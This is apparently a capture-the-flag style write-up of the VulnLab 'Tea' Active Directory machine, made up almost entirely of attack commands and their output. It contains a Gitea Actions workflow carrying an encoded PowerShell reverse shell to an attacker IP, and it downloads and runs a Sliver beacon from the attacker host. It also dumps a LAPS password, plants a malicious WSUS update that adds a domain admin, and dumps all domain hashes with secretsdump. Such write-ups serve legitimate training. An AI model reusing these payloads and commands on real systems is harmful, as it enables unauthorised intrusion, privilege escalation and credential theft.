vulnlab-tea
a medium rated AD chain machine, involved srv.tea.vl having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.
.
giteabuild
Create .gitea/workflows/demo.yaml
file in the repository that we have created.
http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml
name: Build run-name: ${{ gitea.actor }} running build job on: [push] jobs: Explore-Gitea-Actions: runs-on: windows-latest steps: - run: echo "🍏 This job's status is ${{ job.status }}." - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
catch with netcat
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061 PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami tea\thomas.wallace
download & execute Beacon
PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe PS C:\_install> PS C:\_install> ./beacon.exe
Sliver
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk ███████╗██╗ ██╗██╗ ██╗███████╗██████╗ ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ ███████╗██║ ██║██║ ██║█████╗ ██████╔╝ ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ All hackers gain vigilance [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > https --lport 8443 [*] Starting HTTPS :8443 listener ... [*] Successfully started job #1 sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols [*] Generating new windows/amd64 beacon implant binary (5s) [!] Symbol obfuscation is disabled [*] Build completed in 2s [*] Implant saved to /tmp/beacon.exe sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 [*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST sliver > use 9d553a10 [*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc) sliver (tea-3) > ls [*] Tasked beacon tea-3 (2cdcbb9d) [+] tea-3 completed task 2cdcbb9d C:\_install (6 items, 24.0 MiB) =============================== -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup [*] Tasked beacon tea-3 (6338fcbb) [+] tea-3 completed task 6338fcbb [*] sharp-hound-4 output: 2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound 2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices --snip-- 2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM 2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244 2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings. 254 name to SID mappings. 2 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing! [*] Output saved to /tmp/sharp-hound-4_.3130027413.log sliver (tea-3) > ls [*] Tasked beacon tea-3 (3f00e892) [+] tea-3 completed task 3f00e892 C:\_install (8 items, 24.0 MiB) =============================== -rw-rw-rw- 20240820012840_BloodHound.zip 23.2 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin 42.8 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > download 20240820012840_BloodHound.zip [*] Tasked beacon tea-3 (d8c023fe) [+] tea-3 completed task d8c023fe [*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip sliver (tea-3) > ┌──(puck㉿kali)-[~/vulnlab/tea]
.
sliver (tea-3) > interactive [*] Using beacon's active C2 endpoint: https://10.8.2.138:8443 [*] Tasked beacon tea-3 (d48d0ac7) [*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14 [*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14) sliver (tea-3) > shell ? This action is bad OPSEC, are you an adult? Yes [*] Wait approximately 10 seconds after exit, and press <enter> to continue [*] Opening shell tunnel (EOF to exit) ... [*] Started remote shell with pid 4600 PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText Get-LAPSADPassword -Identity SRV -AsPlainText ComputerName : SRV DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl Account : Administrator Password : %t50Z))o4+0Z;6 PasswordUpdateTime : 8/21/2024 11:53:03 PM ExpirationTimestamp : 9/20/2024 11:53:03 PM Source : EncryptedPassword DecryptionStatus : Success AuthorizedDecryptor : TEA\Server Administration PS C:\_install>
.
.
netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local WINRM 10.10.191.134 5985 SRV [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl) WINRM 10.10.191.134 5985 SRV [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)
.
evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'
or
xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389
not finished yet
iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe
.
SharpWSUS
sharpwsus locate sharpwsus inspect sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com" sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2" sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
.
.
C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Create Update C:\WSUS-Updates\WsusContent [*] Creating patch to use the following: [*] Payload: psexec64.exe [*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe [*] Arguments: -accepteula -s -d cmd.exe /c \net [*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net ################# WSUS Server Enumeration via SQL ################## ServerName, WSUSPortNumber, WSUSContentLocation ----------------------------------------------- SRV, 8530, C:\WSUS-Updates\WsusContent ImportUpdate Update Revision ID: 198781 PrepareXMLtoClient InjectURL2Download DeploymentRevision PrepareBundle PrepareBundle Revision ID: 198782 PrepareXMLBundletoClient DeploymentRevision [*] Update created - When ready to deploy use the following command: [*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] To check on the update status use the following command: [*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN [*] To delete the update use the following command: [*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] Create complete There is no such global user or group: puck. There is no such global user or group: " /title:Great. There is no such global user or group: UpdateC21. More help is available by typing NET HELPMSG 3783. C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Approve Update C:\WSUS-Updates\WsusContent Targeting dc.tea.vl TargetComputer, ComputerID, TargetID ------------------------------------ dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1 Group Exists = False Group Created: Group1 Added Computer To Group Approved Update [*] Approve complete C:\_install>
.
┌──(puck㉿kali)-[~/vulnlab] └─$ netexec smb dc.tea.vl -u puckie -p 'Start123!' SMB 10.10.145.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False) SMB 10.10.145.21 445 DC [+] tea.vl\puckie:Start123! (Pwn3d!)
.
Finaly
xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389
.
catch the hashes
impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt
This was super fun.
.